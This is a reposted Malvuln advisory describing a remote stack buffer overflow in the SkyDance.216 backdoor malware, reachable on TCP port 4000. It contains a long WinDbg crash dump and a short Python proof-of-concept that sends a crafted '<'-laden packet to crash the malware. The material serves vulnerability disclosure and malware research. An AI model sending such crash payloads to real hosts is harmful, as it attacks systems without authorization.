Backdoor.Win32.SkyDance.216 / Remote Stack Buffer Overflow

2021.05.22
us malvuln (US) us
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/694ecf256c97ef6e206e2073d37e5944.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.SkyDance.216 Vulnerability: Remote Stack Buffer Overflow Description: The malware listens on TCP port 4000. Third-party attackers who can reach an infected system can trigger a buffer overflow by sending a specially crafted packet. Interestingly, one specific character "\x3c" the "<" symbol seems required to trigger the overflow. Type: PE32 MD5: 694ecf256c97ef6e206e2073d37e5944 Vuln ID: MVID-2021-0222 ASLR: False DEP: False Safe SEH: True Disclosure: 05/22/2021 Memory Dump: (10c8.1240): Stack buffer overflow - code c0000409 (first/second chance not available) eax=00000000 ebx=00000000 ecx=00418b8f edx=00000001 esi=00000000 edi=00000002 eip=77aeed3c esp=0019c9f0 ebp=0019ca30 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 ntdll!ZwWaitForMultipleObjects+0xc: 77aeed3c c21400 ret 14h 0:000> .ecxr eax=ffffffff ebx=0019fc80 ecx=00418b8f edx=00000001 esi=0019d12c edi=00000001 eip=776f72cb esp=0019d0a0 ebp=0019d0a0 iopl=0 nv up ei ng nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286 kernel32!InterlockedDecrementStub+0xb: 776f72cb f00fc101 lock xadd dword ptr [ecx],eax ds:002b:00418b8f=ffff80f6 *** WARNING: Unable to verify checksum for Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: kernel32!InterlockedDecrementStub+b 776f72cb f00fc101 lock xadd dword ptr [ecx],eax EXCEPTION_RECORD: 0019cbf0 -- (.exr 0x19cbf0) ExceptionAddress: 776f72cb (kernel32!InterlockedDecrementStub+0x0000000b) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000008 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 00418b8f Attempt to write to address 00418b8f PROCESS_NAME: Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 00000015 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 CONTEXT: 0019cc40 -- (.cxr 0x19cc40) eax=ffffffff ebx=0019fc80 ecx=00418b8f edx=00000001 esi=0019d12c edi=00000001 eip=776f72cb esp=0019d0a0 ebp=0019d0a0 iopl=0 nv up ei ng nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286 kernel32!InterlockedDecrementStub+0xb: 776f72cb f00fc101 lock xadd dword ptr [ecx],eax ds:002b:00418b8f=ffff80f6 Resetting default scope WRITE_ADDRESS: 00418b8f FOLLOWUP_IP: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8 00410bf8 85c0 test eax,eax FAULTING_THREAD: 00001240 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_ffffffff PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff LAST_CONTROL_TRANSFER: from 00410bf8 to 776f72cb STACK_TEXT: 0019d0a0 00410bf8 00418b8f 0019d12c 00410c7c kernel32!InterlockedDecrementStub+0xb WARNING: Stack unwind information not available. Following frames may be wrong. 0019d130 00401d06 025177c4 00000000 0019fd14 Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x10bf8 00418b9b b8e8e900 ccccfffe cccccccc cccccccc Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x1d06 00418b9f ccccfffe cccccccc cccccccc 0c4d8dcc 0xb8e8e900 00418ba3 cccccccc cccccccc 0c4d8dcc ff80d1e9 0xccccfffe 00418ba7 cccccccc 0c4d8dcc ff80d1e9 084d8dff 0xcccccccc 00418bab 0c4d8dcc ff80d1e9 084d8dff ff80c9e9 0xcccccccc 00418baf ff80d1e9 084d8dff ff80c9e9 044d8dff 0xc4d8dcc 00418bb3 084d8dff ff80c9e9 044d8dff ff80c1e9 0xff80d1e9 00418bb7 ff80c9e9 044d8dff ff80c1e9 d178b8ff 0x84d8dff 00418bbb 044d8dff ff80c1e9 d178b8ff bbe90041 0xff80c9e9 00418bbf ff80c1e9 d178b8ff bbe90041 ccfffeb8 0x44d8dff 00418bc3 d178b8ff bbe90041 ccfffeb8 cccccccc 0xff80c1e9 00418bc7 bbe90041 ccfffeb8 cccccccc cccccccc 0xd178b8ff 00418bcb ccfffeb8 cccccccc cccccccc cccccccc 0xbbe90041 00418bcf cccccccc cccccccc cccccccc 084d8dcc 0xccfffeb8 00418bd3 cccccccc cccccccc 084d8dcc ff80a1e9 0xcccccccc 00418bd7 cccccccc 084d8dcc ff80a1e9 044d8dff 0xcccccccc 00418bdb 084d8dcc ff80a1e9 044d8dff ff8099e9 0xcccccccc 00418bdf ff80a1e9 044d8dff ff8099e9 c88d8dff 0x84d8dcc 00418be3 044d8dff ff8099e9 c88d8dff e9fffffe 0xff80a1e9 00418be7 ff8099e9 c88d8dff e9fffffe ffff808e 0x44d8dff 00418beb c88d8dff e9fffffe ffff808e fecc8d8d 0xff8099e9 00418bef e9fffffe ffff808e fecc8d8d 83e9ffff 0xc88d8dff 00418bf3 ffff808e fecc8d8d 83e9ffff b8ffff80 0xe9fffffe 00418bf7 fecc8d8d 83e9ffff b8ffff80 0041d1b0 0xffff808e 00418bfb 83e9ffff b8ffff80 0041d1b0 feb87de9 0xfecc8d8d 00418bff b8ffff80 0041d1b0 feb87de9 044d8dff 0x83e9ffff 00418c03 0041d1b0 feb87de9 044d8dff ff8071e9 0xb8ffff80 00418c07 feb87de9 044d8dff ff8071e9 f04d8dff Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x1d1b0 0041d1b0 00000000 0041d1d0 00000000 00000000 0xfeb87de9 SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944 IMAGE_NAME: Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe DEBUG_FLR_IMAGE_TIMESTAMP: 38f4751e STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cc40 ; kb FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff_c0000409_Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe!Unknown BUCKET_ID: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_ffffffff_MISSING_GSFRAME_Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8 Followup: MachineOwner --------- 0:000> .exr -1 ExceptionAddress: 776f72cb (kernel32!InterlockedDecrementStub+0x0000000b) ExceptionCode: c0000409 (Stack buffer overflow) ExceptionFlags: 00000008 NumberParameters: 1 Parameter[0]: 00000015 0:000> !exchain 0019caa8: ntdll!_except_handler4+0 (77af6a50) CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (77b357ad) 0019d128: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+18b9b (00418b9b) Invalid exception stack at 02515790 0:000> !address 02515790 Usage: Heap Allocation Base: 02510000 Base Address: 02510000 End Address: 0251f000 Region Size: 0000f000 Type: 00020000 MEM_PRIVATE State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE More info: heap containing the address: !heap 0x2510000 More info: heap entry containing the address: !heap -x 0x2515790 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=4000 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="\x3cc"*900 +" HTTP/1.1" s.send(PAYLOAD) s.close() print("Backdoor.Win32.SkyDance.216 / Remote Stack Buffer Overflow") print("MD5: 694ecf256c97ef6e206e2073d37e5944") print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top